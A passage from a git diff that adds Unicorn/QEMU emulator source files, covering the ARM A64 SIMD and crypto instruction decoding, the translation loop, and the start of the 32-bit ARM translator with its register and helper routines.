gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); + } + if (satop) { + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + } + tcg_temp_free_i32(tcg_ctx, tcg_op); + + if (opcode == 0xa || opcode == 0xb) { + continue; + } + + /* Accumulating op: handle accumulate step */ + read_vec_element(s, tcg_res[pass], rd, pass, MO_64); + + switch (opcode) { + case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], + tcg_passres); + break; + case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + gen_helper_neon_subl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], + tcg_passres); + break; + case 0x7: /* SQDMLSL, SQDMLSL2 */ + gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); + /* fall through */ + case 0x3: /* SQDMLAL, SQDMLAL2 */ + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], + tcg_passres); + break; + default: + g_assert_not_reached(); + } + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + tcg_temp_free_i32(tcg_ctx, tcg_idx); + + if (is_scalar) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_res[0], tcg_res[0]); + } + } + + if (is_scalar) { + tcg_res[1] = tcg_const_i64(tcg_ctx, 0); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } + } + + if (!TCGV_IS_UNUSED_PTR(fpst)) { + tcg_temp_free_ptr(tcg_ctx, fpst); + } +} + +/* C3.6.19 Crypto AES + * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +-----------------+------+-----------+--------+-----+------+------+ + * | 0 1 0 0 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | + * +-----------------+------+-----------+--------+-----+------+------+ + */ +static void disas_crypto_aes(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + int decrypt; + TCGv_i32 tcg_rd_regno, tcg_rn_regno, tcg_decrypt; + CryptoThreeOpEnvFn *genfn; + + if (!arm_dc_feature(s, ARM_FEATURE_V8_AES) + || size != 0) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0x4: /* AESE */ + decrypt = 0; + genfn = gen_helper_crypto_aese; + break; + case 0x6: /* AESMC */ + decrypt = 0; + genfn = gen_helper_crypto_aesmc; + break; + case 0x5: /* AESD */ + decrypt = 1; + genfn = gen_helper_crypto_aese; + break; + case 0x7: /* AESIMC */ + decrypt = 1; + genfn = gen_helper_crypto_aesmc; + break; + default: + unallocated_encoding(s); + return; + } + + /* Note that we convert the Vx register indexes into the + * index within the vfp.regs[] array, so we can share the + * helper with the AArch32 instructions. + */ + tcg_rd_regno = tcg_const_i32(tcg_ctx, rd << 1); + tcg_rn_regno = tcg_const_i32(tcg_ctx, rn << 1); + tcg_decrypt = tcg_const_i32(tcg_ctx, decrypt); + + genfn(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, tcg_rn_regno, tcg_decrypt); + + tcg_temp_free_i32(tcg_ctx, tcg_rd_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rn_regno); + tcg_temp_free_i32(tcg_ctx, tcg_decrypt); +} + +/* C3.6.20 Crypto three-reg SHA + * 31 24 23 22 21 20 16 15 14 12 11 10 9 5 4 0 + * +-----------------+------+---+------+---+--------+-----+------+------+ + * | 0 1 0 1 1 1 1 0 | size | 0 | Rm | 0 | opcode | 0 0 | Rn | Rd | + * +-----------------+------+---+------+---+--------+-----+------+------+ + */ +static void disas_crypto_three_reg_sha(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 3); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + CryptoThreeOpEnvFn *genfn; + TCGv_i32 tcg_rd_regno, tcg_rn_regno, tcg_rm_regno; + int feature = ARM_FEATURE_V8_SHA256; + + if (size != 0) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0: /* SHA1C */ + case 1: /* SHA1P */ + case 2: /* SHA1M */ + case 3: /* SHA1SU0 */ + genfn = NULL; + feature = ARM_FEATURE_V8_SHA1; + break; + case 4: /* SHA256H */ + genfn = gen_helper_crypto_sha256h; + break; + case 5: /* SHA256H2 */ + genfn = gen_helper_crypto_sha256h2; + break; + case 6: /* SHA256SU1 */ + genfn = gen_helper_crypto_sha256su1; + break; + default: + unallocated_encoding(s); + return; + } + + if (!arm_dc_feature(s, feature)) { + unallocated_encoding(s); + return; + } + + tcg_rd_regno = tcg_const_i32(tcg_ctx, rd << 1); + tcg_rn_regno = tcg_const_i32(tcg_ctx, rn << 1); + tcg_rm_regno = tcg_const_i32(tcg_ctx, rm << 1); + + if (genfn) { + genfn(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, tcg_rn_regno, tcg_rm_regno); + } else { + TCGv_i32 tcg_opcode = tcg_const_i32(tcg_ctx, opcode); + + gen_helper_crypto_sha1_3reg(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, + tcg_rn_regno, tcg_rm_regno, tcg_opcode); + tcg_temp_free_i32(tcg_ctx, tcg_opcode); + } + + tcg_temp_free_i32(tcg_ctx, tcg_rd_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rn_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rm_regno); +} + +/* C3.6.21 Crypto two-reg SHA + * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +-----------------+------+-----------+--------+-----+------+------+ + * | 0 1 0 1 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | + * +-----------------+------+-----------+--------+-----+------+------+ + */ +static void disas_crypto_two_reg_sha(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + CryptoTwoOpEnvFn *genfn; + int feature; + TCGv_i32 tcg_rd_regno, tcg_rn_regno; + + if (size != 0) { + unallocated_encoding(s); + return; + } + + switch (opcode) { + case 0: /* SHA1H */ + feature = ARM_FEATURE_V8_SHA1; + genfn = gen_helper_crypto_sha1h; + break; + case 1: /* SHA1SU1 */ + feature = ARM_FEATURE_V8_SHA1; + genfn = gen_helper_crypto_sha1su1; + break; + case 2: /* SHA256SU0 */ + feature = ARM_FEATURE_V8_SHA256; + genfn = gen_helper_crypto_sha256su0; + break; + default: + unallocated_encoding(s); + return; + } + + if (!arm_dc_feature(s, feature)) { + unallocated_encoding(s); + return; + } + + tcg_rd_regno = tcg_const_i32(tcg_ctx, rd << 1); + tcg_rn_regno = tcg_const_i32(tcg_ctx, rn << 1); + + genfn(tcg_ctx, tcg_ctx->cpu_env, tcg_rd_regno, tcg_rn_regno); + + tcg_temp_free_i32(tcg_ctx, tcg_rd_regno); + tcg_temp_free_i32(tcg_ctx, tcg_rn_regno); +} + +/* C3.6 Data processing - SIMD, inc Crypto + * + * As the decode gets a little complex we are using a table based + * approach for this part of the decode. + */ +static const AArch64DecodeTable data_proc_simd[] = { + /* pattern , mask , fn */ + { 0x0e200400, 0x9f200400, disas_simd_three_reg_same }, + { 0x0e200000, 0x9f200c00, disas_simd_three_reg_diff }, + { 0x0e200800, 0x9f3e0c00, disas_simd_two_reg_misc }, + { 0x0e300800, 0x9f3e0c00, disas_simd_across_lanes }, + { 0x0e000400, 0x9fe08400, disas_simd_copy }, + { 0x0f000000, 0x9f000400, disas_simd_indexed }, /* vector indexed */ + /* simd_mod_imm decode is a subset of simd_shift_imm, so must precede it */ + { 0x0f000400, 0x9ff80400, disas_simd_mod_imm }, + { 0x0f000400, 0x9f800400, disas_simd_shift_imm }, + { 0x0e000000, 0xbf208c00, disas_simd_tb }, + { 0x0e000800, 0xbf208c00, disas_simd_zip_trn }, + { 0x2e000000, 0xbf208400, disas_simd_ext }, + { 0x5e200400, 0xdf200400, disas_simd_scalar_three_reg_same }, + { 0x5e200000, 0xdf200c00, disas_simd_scalar_three_reg_diff }, + { 0x5e200800, 0xdf3e0c00, disas_simd_scalar_two_reg_misc }, + { 0x5e300800, 0xdf3e0c00, disas_simd_scalar_pairwise }, + { 0x5e000400, 0xdfe08400, disas_simd_scalar_copy }, + { 0x5f000000, 0xdf000400, disas_simd_indexed }, /* scalar indexed */ + { 0x5f000400, 0xdf800400, disas_simd_scalar_shift_imm }, + { 0x4e280800, 0xff3e0c00, disas_crypto_aes }, + { 0x5e000000, 0xff208c00, disas_crypto_three_reg_sha }, + { 0x5e280800, 0xff3e0c00, disas_crypto_two_reg_sha }, + { 0x00000000, 0x00000000, NULL } +}; + +static void disas_data_proc_simd(DisasContext *s, uint32_t insn) +{ + /* Note that this is called with all non-FP cases from + * table C3-6 so it must UNDEF for entries not specifically + * allocated to instructions in that table. + */ + AArch64DecodeFn *fn = lookup_disas_fn(&data_proc_simd[0], insn); + if (fn) { + fn(s, insn); + } else { + unallocated_encoding(s); + } +} + +/* C3.6 Data processing - SIMD and floating point */ +static void disas_data_proc_simd_fp(DisasContext *s, uint32_t insn) +{ + if (extract32(insn, 28, 1) == 1 && extract32(insn, 30, 1) == 0) { + disas_data_proc_fp(s, insn); + } else { + /* SIMD, including crypto */ + disas_data_proc_simd(s, insn); + } +} + +/* C3.1 A64 instruction index by encoding */ +static void disas_a64_insn(CPUARMState *env, DisasContext *s) +{ + uint32_t insn; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + + // Unicorn: end address tells us to stop emulation + if (s->pc == s->uc->addr_end) { + // imitate WFI instruction to halt emulation + s->is_jmp = DISAS_WFI; + return; + } + + insn = arm_ldl_code(env, s->pc, s->bswap_code); + s->insn = insn; + s->pc += 4; + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, s->pc - 4)) { + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, env->uc, s->pc - 4); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + s->fp_access_checked = false; + + switch (extract32(insn, 25, 4)) { + case 0x0: case 0x1: case 0x2: case 0x3: /* UNALLOCATED */ + unallocated_encoding(s); + break; + case 0x8: case 0x9: /* Data processing - immediate */ + disas_data_proc_imm(s, insn); + break; + case 0xa: case 0xb: /* Branch, exception generation and system insns */ + disas_b_exc_sys(s, insn); + break; + case 0x4: + case 0x6: + case 0xc: + case 0xe: /* Loads and stores */ + disas_ldst(s, insn); + break; + case 0x5: + case 0xd: /* Data processing - register */ + disas_data_proc_reg(s, insn); + break; + case 0x7: + case 0xf: /* Data processing - SIMD and floating point */ + disas_data_proc_simd_fp(s, insn); + break; + default: + assert(FALSE); /* all 15 cases should be handled above */ + break; + } + + /* if we allocated any temporaries, free them here */ + free_tmp_a64(s); +} + +void gen_intermediate_code_internal_a64(ARMCPU *cpu, + TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + DisasContext dc1, *dc = &dc1; + CPUBreakpoint *bp; + uint16_t *gen_opc_end; + int j, lj; + target_ulong pc_start; + target_ulong next_page_start; + int num_insns; + int max_insns; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + bool block_full = false; + + pc_start = tb->pc; + + dc->uc = env->uc; + dc->tb = tb; + + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + dc->is_jmp = DISAS_NEXT; + dc->pc = pc_start; + dc->singlestep_enabled = cs->singlestep_enabled; + dc->condjmp = 0; + + dc->aarch64 = 1; + dc->thumb = 0; +#if defined(TARGET_WORDS_BIGENDIAN) + dc->bswap_code = 1; +#else + dc->bswap_code = 0; +#endif + dc->condexec_mask = 0; + dc->condexec_cond = 0; +#if !defined(CONFIG_USER_ONLY) + dc->user = (ARM_TBFLAG_AA64_EL(tb->flags) == 0); +#endif + dc->cpacr_fpen = ARM_TBFLAG_AA64_FPEN(tb->flags); + dc->vec_len = 0; + dc->vec_stride = 0; + dc->cp_regs = cpu->cp_regs; + dc->current_el = arm_current_el(env); + dc->features = env->features; + + /* Single step state. The code-generation logic here is: + * SS_ACTIVE == 0: + * generate code with no special handling for single-stepping (except + * that anything that can make us go to SS_ACTIVE == 1 must end the TB; + * this happens anyway because those changes are all system register or + * PSTATE writes). + * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) + * emit code for one insn + * emit code to clear PSTATE.SS + * emit code to generate software step exception for completed step + * end TB (as usual for having generated an exception) + * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) + * emit code to generate a software step exception + * end the TB + */ + dc->ss_active = ARM_TBFLAG_AA64_SS_ACTIVE(tb->flags); + dc->pstate_ss = ARM_TBFLAG_AA64_PSTATE_SS(tb->flags); + dc->is_ldex = false; + dc->ss_same_el = (arm_debug_target_el(env) == dc->current_el); + + init_tmp_a64_array(dc); + + next_page_start = (pc_start & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; + lj = -1; + num_insns = 0; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) { + max_insns = CF_COUNT_MASK; + } + + tcg_clear_temp_count(); + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + // imitate WFI instruction to halt emulation + gen_tb_start(tcg_ctx); + dc->is_jmp = DISAS_WFI; + goto tb_end; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + + do { + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == dc->pc) { + gen_exception_internal_insn(dc, 0, EXCP_DEBUG); + /* Advance PC so that clearing the breakpoint will + invalidate this TB. */ + dc->pc += 2; + goto done_generating; + } + } + } + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) { + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + } + tcg_ctx->gen_opc_pc[lj] = dc->pc; + tcg_ctx->gen_opc_instr_start[lj] = 1; + //tcg_ctx->gen_opc_icount[lj] = num_insns; + } + + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) { + // gen_io_start(); + //} + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, dc->pc); + } + + if (dc->ss_active && !dc->pstate_ss) { + /* Singlestep state is Active-pending. + * If we're in this state at the start of a TB then either + * a) we just took an exception to an EL which is being debugged + * and this is the first insn in the exception handler + * b) debug exceptions were masked and we just unmasked them + * without changing EL (eg by clearing PSTATE.D) + * In either case we're going to take a swstep exception in the + * "did not step an insn" case, and so the syndrome ISV and EX + * bits should be zero. + */ + assert(num_insns == 0); + gen_exception(dc, EXCP_UDEF, syn_swstep(dc->ss_same_el, 0, 0)); + dc->is_jmp = DISAS_EXC; + break; + } + + disas_a64_insn(env, dc); + + if (tcg_check_temp_count()) { + fprintf(stderr, "TCG temporary leak before "TARGET_FMT_lx"\n", + dc->pc); + } + + /* Translation stops when a conditional branch is encountered. + * Otherwise the subsequent code could get translated several times. + * Also stop translation when a page boundary is reached. This + * ensures prefetch aborts occur at the right place. + */ + num_insns++; + } while (!dc->is_jmp && tcg_ctx->gen_opc_ptr < gen_opc_end && + !cs->singlestep_enabled && + !dc->ss_active && + dc->pc < next_page_start && + num_insns < max_insns); + + /* if too long translation, save this info */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) { + block_full = true; + } + + //if (tb->cflags & CF_LAST_IO) { + // gen_io_end(); + //} + +tb_end: + if (unlikely(cs->singlestep_enabled || dc->ss_active) + && dc->is_jmp != DISAS_EXC) { + /* Note that this means single stepping WFI doesn't halt the CPU. + * For conditional branch insns this is harmless unreachable code as + * gen_goto_tb() has already handled emitting the debug exception + * (and thus a tb-jump is not possible when singlestepping). + */ + assert(dc->is_jmp != DISAS_TB_JUMP); + if (dc->is_jmp != DISAS_JUMP) { + gen_a64_set_pc_im(dc, dc->pc); + } + if (cs->singlestep_enabled) { + gen_exception_internal(dc, EXCP_DEBUG); + } else { + gen_step_complete_exception(dc); + } + } else { + switch (dc->is_jmp) { + case DISAS_NEXT: + gen_goto_tb(dc, 1, dc->pc); + break; + default: + case DISAS_UPDATE: + gen_a64_set_pc_im(dc, dc->pc); + /* fall through */ + case DISAS_JUMP: + /* indicate that the hash table must be used to find the next TB */ + tcg_gen_exit_tb(tcg_ctx, 0); + break; + case DISAS_TB_JUMP: + case DISAS_EXC: + case DISAS_SWI: + break; + case DISAS_WFE: + gen_a64_set_pc_im(dc, dc->pc); + gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); + break; + case DISAS_WFI: + /* This is a special case because we don't want to just halt the CPU + * if trying to debug across a WFI. + */ + gen_a64_set_pc_im(dc, dc->pc); + gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env); + break; + } + } + +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) { + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + } else { + tb->size = dc->pc - pc_start; + tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.c new file mode 100644 index 0000000..f172b33 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate.c @@ -0,0 +1,11633 @@ +/* + * ARM translation + * + * Copyright (c) 2003 Fabrice Bellard + * Copyright (c) 2005-2007 CodeSourcery + * Copyright (c) 2007 OpenedHand, Ltd. + * Copyright (c) 2015 Nguyen Anh Quynh (Unicorn engine) + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "internals.h" +#include "tcg-op.h" +#include "qemu/log.h" +#include "qemu/bitops.h" +#include "arm_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#define ENABLE_ARCH_4T arm_dc_feature(s, ARM_FEATURE_V4T) +#define ENABLE_ARCH_5 arm_dc_feature(s, ARM_FEATURE_V5) +/* currently all emulated v5 cores are also v5TE, so don't bother */ +#define ENABLE_ARCH_5TE arm_dc_feature(s, ARM_FEATURE_V5) +#define ENABLE_ARCH_5J 0 +#define ENABLE_ARCH_6 arm_dc_feature(s, ARM_FEATURE_V6) +#define ENABLE_ARCH_6K arm_dc_feature(s, ARM_FEATURE_V6K) +#define ENABLE_ARCH_6T2 arm_dc_feature(s, ARM_FEATURE_THUMB2) +#define ENABLE_ARCH_7 arm_dc_feature(s, ARM_FEATURE_V7) +#define ENABLE_ARCH_8 arm_dc_feature(s, ARM_FEATURE_V8) + +#define ARCH(x) do { if (!ENABLE_ARCH_##x) goto illegal_op; } while(0) + +#include "translate.h" + +#if defined(CONFIG_USER_ONLY) +#define IS_USER(s) 1 +#else +#define IS_USER(s) (s->user) +#endif + +#ifdef CONFIG_USER_ONLY +static TCGv_i64 cpu_exclusive_test; +static TCGv_i32 cpu_exclusive_info; +#endif + + +static const char *regnames[] = + { "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", + "r8", "r9", "r10", "r11", "r12", "r13", "r14", "pc" }; + +/* initialize TCG globals. */ +void arm_translate_init(struct uc_struct *uc) +{ + int i; + TCGContext *tcg_ctx = uc->tcg_ctx; + + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(uc->tcg_ctx, TCG_AREG0, "env"); + + for (i = 0; i < 16; i++) { + tcg_ctx->cpu_R[i] = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, regs[i]), + regnames[i]); + } + tcg_ctx->cpu_CF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, CF), "CF"); + tcg_ctx->cpu_NF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, NF), "NF"); + tcg_ctx->cpu_VF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, VF), "VF"); + tcg_ctx->cpu_ZF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, ZF), "ZF"); + + tcg_ctx->cpu_exclusive_addr = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_addr), "exclusive_addr"); + tcg_ctx->cpu_exclusive_val = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_val), "exclusive_val"); +#ifdef CONFIG_USER_ONLY + cpu_exclusive_test = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_test), "exclusive_test"); + cpu_exclusive_info = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_info), "exclusive_info"); +#endif + + a64_translate_init(uc); +} + +static inline TCGv_i32 load_cpu_offset(struct uc_struct *uc, int offset) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offset); + return tmp; +} + +#define load_cpu_field(uc, name) load_cpu_offset(uc, offsetof(CPUARMState, name)) + +static inline void store_cpu_offset(TCGContext *tcg_ctx, TCGv_i32 var, int offset) +{ + tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); + tcg_temp_free_i32(tcg_ctx, var); +} + +#define store_cpu_field(s, var, name) \ + store_cpu_offset(s, var, offsetof(CPUARMState, name)) + +/* Set a variable to the value of a CPU register. */ +static void load_reg_var(DisasContext *s, TCGv_i32 var, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (reg == 15) { + uint32_t addr; + /* normally, since we updated PC, we need only to add one insn */ + if (s->thumb) + addr = (long)s->pc + 2; + else + addr = (long)s->pc + 4; + tcg_gen_movi_i32(tcg_ctx, var, addr); + } else { + tcg_gen_mov_i32(tcg_ctx, var, tcg_ctx->cpu_R[reg & 0x0f]); + } +} + +/* Create a new temporary and set it to the value of a CPU register. */ +static inline TCGv_i32 load_reg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + load_reg_var(s, tmp, reg); + return tmp; +} + +/* Set a CPU register. The source must be a temporary and will be + marked as dead. */ +static void store_reg(DisasContext *s, int reg, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (reg == 15) { + tcg_gen_andi_i32(tcg_ctx, var, var, ~1); + s->is_jmp = DISAS_JUMP; + } + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[reg & 0x0f], var); + tcg_temp_free_i32(tcg_ctx, var); +} + +/* Value extensions. */ +#define gen_uxtb(var) tcg_gen_ext8u_i32(tcg_ctx, var, var) +#define gen_uxth(var) tcg_gen_ext16u_i32(tcg_ctx, var, var) +#define gen_sxtb(var) tcg_gen_ext8s_i32(tcg_ctx, var, var) +#define gen_sxth(var) tcg_gen_ext16s_i32(tcg_ctx, var, var) + +#define gen_sxtb16(var) gen_helper_sxtb16(tcg_ctx, var, var) +#define gen_uxtb16(var) gen_helper_uxtb16(tcg_ctx, var, var) + + +static inline void gen_set_cpsr(DisasContext *s, TCGv_i32 var, uint32_t mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp_mask = tcg_const_i32(tcg_ctx, mask); + gen_helper_cpsr_write(tcg_ctx, tcg_ctx->cpu_env, var, tmp_mask); + tcg_temp_free_i32(tcg_ctx, tmp_mask); +} +/* Set NZCV flags from the high 4 bits of var. */ +#define gen_set_nzcv(s, var) gen_set_cpsr(s, var, CPSR_NZCV) + +static void gen_exception_internal(DisasContext *s, int excp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + + assert(excp_is_internal(excp)); + gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_exception(DisasContext *s, int excp, uint32_t syndrome) // qq +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + TCGv_i32 tcg_syn = tcg_const_i32(tcg_ctx, syndrome); + + gen_helper_exception_with_syndrome(tcg_ctx, tcg_ctx->cpu_env, tcg_excp, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_ss_advance(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* If the singlestep state is Active-not-pending, advance to + * Active-pending. + */ + if (s->ss_active) { + s->pstate_ss = 0; + gen_helper_clear_pstate_ss(tcg_ctx, tcg_ctx->cpu_env); + } +} + +static void gen_step_complete_exception(DisasContext *s) +{ + /* We just completed step of an insn. Move from Active-not-pending + * to Active-pending, and then also take the swstep exception. + * This corresponds to making the (IMPDEF) choice to prioritize + * swstep exceptions over asynchronous exceptions taken to an exception + * level where debug is disabled. This choice has the advantage that + * we do not need to maintain internal state corresponding to the + * ISV/EX syndrome bits between completion of the step and generation + * of the exception, and our syndrome information is always correct. + */ + gen_ss_advance(s); + gen_exception(s, EXCP_UDEF, syn_swstep(s->ss_same_el, 1, s->is_ldex)); + s->is_jmp = DISAS_EXC; +} + +static void gen_smul_dual(DisasContext *s, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ext16s_i32(tcg_ctx, tmp1, a); + tcg_gen_ext16s_i32(tcg_ctx, tmp2, b); + tcg_gen_mul_i32(tcg_ctx, tmp1, tmp1, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_sari_i32(tcg_ctx, a, a, 16); + tcg_gen_sari_i32(tcg_ctx, b, b, 16); + tcg_gen_mul_i32(tcg_ctx, b, b, a); + tcg_gen_mov_i32(tcg_ctx, a, tmp1); + tcg_temp_free_i32(tcg_ctx, tmp1); +} + +/* Byteswap each halfword. */ +static void gen_rev16(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, tmp, var, 8); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x00ff00ff); + tcg_gen_shli_i32(tcg_ctx, var, var, 8); + tcg_gen_andi_i32(tcg_ctx, var, var, 0xff00ff00); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +/* Byteswap low halfword and sign extend. */ +static void gen_revsh(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_ext16u_i32(tcg_ctx, var, var); + tcg_gen_bswap16_i32(tcg_ctx, var, var); + tcg_gen_ext16s_i32(tcg_ctx, var, var); +} + +/* Unsigned bitfield extract. */ +static void gen_ubfx(DisasContext *s, TCGv_i32 var, int shift, uint32_t mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (shift) + tcg_gen_shri_i32(tcg_ctx, var, var, shift); + tcg_gen_andi_i32(tcg_ctx, var, var, mask); +} + +/* Signed bitfield extract. */ +static void gen_sbfx(DisasContext *s, TCGv_i32 var, int shift, int width) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t signbit; + + if (shift) + tcg_gen_sari_i32(tcg_ctx, var, var, shift); + if (shift + width < 32) { + signbit = 1u << (width - 1); + tcg_gen_andi_i32(tcg_ctx, var, var, (1u << width) - 1); + 